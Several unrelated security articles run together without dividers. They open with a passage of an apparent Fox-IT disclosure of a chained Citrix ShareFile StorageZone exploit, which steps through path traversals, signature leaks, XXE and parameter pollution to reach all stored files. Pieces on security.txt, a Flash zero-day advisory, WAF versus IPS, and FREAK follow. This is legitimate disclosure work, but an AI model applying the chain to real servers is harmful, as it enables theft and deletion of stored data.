<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
</Items>
<Log>
<EventID>fif11465-ba81-8b77-7dd9-4256bc375017</EventID>
<UserID>c7add7af-91ac-4331-b48a-0aeed4a58687</UserID>
<OwnerID>c7add7af-91ac-4331-b48a-0aeed4a58687</OwnerID>
<AccountID>a4ea881a-a4d5-433a-fa44-41acd5ed5a5f</AccountID>
<UserEmailAddress>fox-it@redacted</UserEmailAddress>
<Name>tfile</Name>
<FileCount>1</FileCount>
<AdditionalInfo>fif11465-ba81-8b77-7dd9-4256bc375017</AdditionalInfo>
<FolderID>foh160ab-aa5a-4e43-96fd-e41caed36cea</FolderID>
<ParentID>foh160ab-aa5a-4e43-96fd-e41caed36cea</ParentID>
<Path>/root/a4ea881a-a4d5-433a-fa44-41acd5ed5a5f/foh160ab-aa5a-4e43-96fd-e41caed36cea</Path>
<IncrementDownloadCount>false</IncrementDownloadCount>
<ShareID />
</Log>
</ShareFileDownloadInfo>

Two things are of interest here. The first is the path property of the File element, which specifies which file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f which is the ShareFile AccountID, which is unique per ShareFile instance. Then the second ID fi0f0f2e_3477_4647_9cdd_e89758c21c37 is unique for the file (hence the fi prefix), with two 0f subdirectories for the first characters of the ID (presumably to prevent huge folder listings).

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a program written in .NET and running under IIS, it is trivial to decompile the binaries with toos such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Token XML files integrity integrity not verified

During our research we of course attempted to simply edit the XML file without changing the signature, and it turned out that it is not nessecary to calculate the signature as an attacker, since the application simply tells you what correct signature is if it doesn’t match:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code which calculates the signature, it turned out that the signature is calculated by prepending the secret to the data and calculating a sha1 hash over this. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used here in the name of the temporary directory. Since we do not see any validation taking place of this path, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains a HMAC, which makes modifying this parameter seemingly impossible:

HMAC Url

However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request, which is then used to verify all parameters in the url before the h parameter. Thus any parameters following the h in the URL are completely unverified!

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:

uploadid-double.png

We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values which are separated with a comma. Only the first uploadid parameter is verified by the HMAC, since it operates on the query string instead of the individual parameter values, and only verifies the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Polution.

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attackers account this way also recursively deletes all files and folders in the temporary directory. By traversing the path to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.

Conclusion

By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Token XML files integrity integrity not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick with following up on the issues and rolling out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown if they were using the hybrid setup in a vulnerable configuration. Therefor, the number of affected installations and if these issues were abused is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned

Implement “security.txt” to advocate responsible vuln. disclosures

Implement

After discussing CAA record in DNS to whitelist your certificate authorities in my previous article, do you know it's a matter of time that someone finds an issue with your web-presence, website or any front-facing application? If they do, what do you expect them to do? Keep it under the wrap, or disclose it to you "responsibly"? This article is for you if you advocate the responsible disclosure; else, you have to do catch up with reality (I shall come back to you later!). Now, while we are on responsible disclosure, the "well-behaved" hackers or security researchers can either reach you via bug-bounty channels, your info@example email (not recommended), social media, or would be struggling to find a secure channel. But, what if you have a way to broadcast your "security channel" details to ease out their communication, and provide them with a well documented, managed and sought out conversation channel? Isn't that cool? Voila, so what robots.txt is to search engines, security.txt is to security researchers!

I know you might be thinking, "...what if I have a page on my website which lists the security contacts?." But, where would you host this page - under contact-us, security, information, about-us etc.? This is the very issue that security.txt evangelists are trying to solve - standardize the file, path and it's presence as part of RFC 5785. As per their website,

Security.txt defines a standard to help organizations define the process for security researchers to disclose security vulnerabilities securely.

The project is still in early stages[1], but is already receiving positive feedback from the security community, and big tech players like Google[2] have incorporated it as well. In my opinion, it very well advocates that you take security seriously, and are ready to have an open conversation with the security community if they want to report a finding, vulnerability or a security issue with your website/ application. By all means, it sends a positive message!

Semantics/format of "security.txt"

As the security.txt follows a standard here are some points to consider,

  • The file security.txt has to be placed in .well-known directory under your domain parent directory, i.e. example.com/.well-known/security.txt
  • It documents the following fields,
    • Comments: The file can have information in the comment section that is optional. The comments shall begin with # symbol.
    • Each separate field needs a new line to define and represent.
    • Contact: This field can be an email address, phone or a link to a page where a security researcher can contact you. This field is mandatory and MUST be available in the file. It should adhere to RFC3986[3] for the syntax of email, phone and URI (MUST be served over HTTPS). Possible examples are,
      Contact: mailto:security@example.com.
      Contact: tel:+1-201-555-0123
      Contact: https://example.com/security-contact.html
    • Encryption: This directive should link to your encryption key if you expect the researcher to encrypt the communication. It MUST NOT be the key, but a URI to the key-file.
    • Signature: If you want to show the file integrity, you can use this directive to link to the signature of the file. Each of the signature files must be named as security.txt.sig and accessible at /.well-known/ path.
    • Policy: You can use this directive to link to your "security policy".
    • Acknowledgement: This derivative can be used to acknowledge the previous researchers, and findings. It should contain company and individual names.
    • Hiring: Wanna hire people? Then, this is the place you post.

A reference security.txt extracted from Google,

Contact: https://g.co/vulnz
Contact: mailto:security@google.com
Encryption: https://services.google.com/corporate/publickey.txt
Acknowledgement: https://bughunter.withgoogle.com/
Policy: https://g.co/vrp
Hiring: https://g.co/SecurityPrivacyEngJobs

Hope this articles gives you an idea of implementing security.txt file, and the very importance of it.

Stay safe!


  1. Early drafted posted for RFC review: https://tools.ietf.org/html/draft-foudil-securitytxt-03 ↩︎

  2. Google security.txt file: https://www.google.com/.well-known/security.txt ↩︎

  3. Uniform Resource Identifier: https://tools.ietf.org/html/rfc3986 ↩︎

Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) – Threat Attribution, Attack Scenario and Recommendations

On Jan. 31, KISA (KrCERT) published an advisory about an Adobe Flash zero-day vulnerability (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the vulnerability exists in Adobe Flash Player 28.0.0.137 and earlier versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.

FireEye began investigating the vulnerability following the release of the initial advisory from KISA.

Threat Attribution

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.

In the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.

Attack Scenario

Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.

Recommendations

Adobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommended that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation state groups will attempt to exploit the vulnerability in the near term.

FireEye Solutions Detections

FireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our FireEye Customer Communities post.

WAF and IPS. Does your environment need both?

WAF and IPS. Does your environment need both?

I have been in fair amount of discussions with management on the need for WAF, and IPS; they often confuse them and their basic purpose. It has been usually discussed after a pentest or vulnerability assessment, that if I can't fix this vulnerability - shall I just put an IPS or WAF to protect the intrusion/ exploitation? Or, sometimes they are considered as the silver bullet to thwart off the attackers instead of fixing the bugs. So, let me tell you - This is not good!

The security products are well suited to protect from something "unknown" or something that you have "unknowingly missed". It is not a silver bullet or an excuse to keep systems/ applications unpatched.

Security shouldn't be an AND/OR case. More the merrier only if they have been configured properly and each one of the product(s) has a different role to play under the flag of defense in depth! So, while I started this article as WAF vs. IPS - it's time to understand it's WAF and IPS. The ecosystem of your production environment is evolving and so is the threat landscape - it's more complex to protect than it was 5 years ago. Attackers are running at your pace, if not faster & a step ahead. These adversary as well piggy-back existing threats to launch their exploits. Often something that starts as simple as DDOS to overwhelm your networks, concedes in an application layer attack. So, network firewall, application firewall, anti-malware, IPS, SIEM etc. all have an important task and should be omnipresent with bells and whistles!

Nevertheless, whether it's a WAF or an IPS; each has it's own purpose and though they can't replace each other, they often have gray areas under which you can rest your risks. This blog will try to address these gray areas, and the associated differences to make life easier when it comes to WAF (Web Application Firewall) or IPS (Intrusion Prevention System). The assumption is both are modern products, and the IPS have deep packet inspection capabilities. Now, let's try to understand the infrastructure, environment and scope of your golden eggs before we can take a call which is the best way to protect the data,

  1. If you are protecting only the "web applications" running on HTTP sockets, then WAF is enough. IPS will be cherry on cake.
  2. If you are protecting all sorts of traffic - SSH, FTP, HTTP etc. then WAF is of less use at it can't inspect non HTTP traffic. I would recommend having a deep packet inspection IPS.
  3. WAF must not be considered as an alternative for traditional network firewalls. It works on the application layer and hence is primarily useful on HTTP, SSL (decryption), Javascript, AJAX, ActiveX, Session management kind of traffic.
  4. A typical IPS does not decrypt SSL traffic, and therefore is insufficient in packet inspection on HTTPS session.
  5. There is wide difference in the traffic visibility and base-lining for anomalies. While WAF has an "understanding" of traffic - HTTP GET, POST, URL, SSL etc. the IPS only understands it as network traffic and therefore can do layer 3/4 checks - bandwidth, packet size, raw protocol decoding/ anomalies but not the GET/ POST or session management.
  6. IPS is useful in cases where RDP, SSH or FTP traffic has to be inspected before it reaches the box to make sure that the protocol is not tampered or wrapped with another TCP packet etc.

Both the technologies have matured and have many gray areas of working but understand that WAF knows and capture the contents of HTTP traffic to see if there is a SQL injection, XSS or cookie manipulation but the IPS have very little or no understanding of the underlying application, therefore can't do much with the traffic contents. An IPS can't raise an alarm if someone is getting confidential data out, or even sending a harmful parameter to your application - it will let it through if it's a valid HTTP packet.

Now, with the information I just shared, try to have a conversation with your management on how to provide the best layered approach in security. How to make sure the network, and application is resilient to complex attacks and threats lurking at your perimeter, or inside.

Be safe.

Statement: Smoothwall and the "FREAK" Vulnerability

In light of the recent "FREAK" vulnerability, in which web servers and web browsers can be cajoled into using older, more vulnerable ciphers in encrypted communications, we would like to assure customers that the web server configuration on an up-to-date Smoothwall system is not vulnerable to this attack.

Similarly, if you are using "HTTPS Decrypt & Inspect" in Smoothwall, your clients' browsers will afforded some protection from attack, as their traffic will be re-encrypted by the web filter, which does not support downgrading to these "Export Grade" ciphers.